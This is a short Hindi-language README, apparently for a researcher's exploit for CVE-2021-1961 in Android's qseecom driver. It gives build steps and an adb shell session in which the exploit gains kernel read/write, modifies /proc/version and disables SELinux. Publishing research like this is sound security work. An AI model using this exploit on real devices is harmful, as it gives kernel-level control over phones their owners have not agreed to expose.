
CVE-2021-1961 के लिए एक्सप्लॉइट कोड
CVE-2021-1961 के लिए एक्सप्लॉइट कोड। पूरा विवरण उपलब्ध है मेरे ब्लॉग पर.
एक्सप्लॉइट बनाने के लिए, Android NDK का ndk-build चलाएँ।
एक्सप्लॉइट चलाने के लिए, आपके पास /dev/qseecom तक पहुँच होनी चाहिए, जिसका मतलब है कि आपके पास सही user/group और सही SELinux context होना चाहिए। यह या तो डीबग इमेज पर su system कमांड का उपयोग करके किया जा सकता है, या Magisk के साथ पैच की गई स्टॉक इमेज पर su - system कमांड का उपयोग करके किया जा सकता है।
यहाँ Magisk के साथ पैच की गई स्टॉक इमेज पर एक्सप्लॉइट चलाने का एक उदाहरण है:
$ adb push qseecom_exploit /data/local/tmp
$ adb shell
blueline:/ $ cd /data/local/tmp
blueline:/data/local/tmp $ su - system
blueline:/data/local/tmp $ id
uid=1000(system) gid=1000(system) groups=1000(system) context=u:r:magisk:s0
blueline:/data/local/tmp $ getenforce
Enforcing
blueline:/data/local/tmp $ ./qseecom_exploit
[+] Setup widevine
[+] Got a 32 bit addresses ION
[+] Setup exploit kernel r/w
[+] Found kallsyms_token_table marker
[+] Found all kallsyms data
[+] Kernel virtual base address: 0xffffff9b9b080000
[+] Modified /proc/version
[+] Disabled SELinux
blueline:/data/local/tmp $ cat /proc/version
*modified*
blueline:/data/local/tmp $ getenforce
Permissive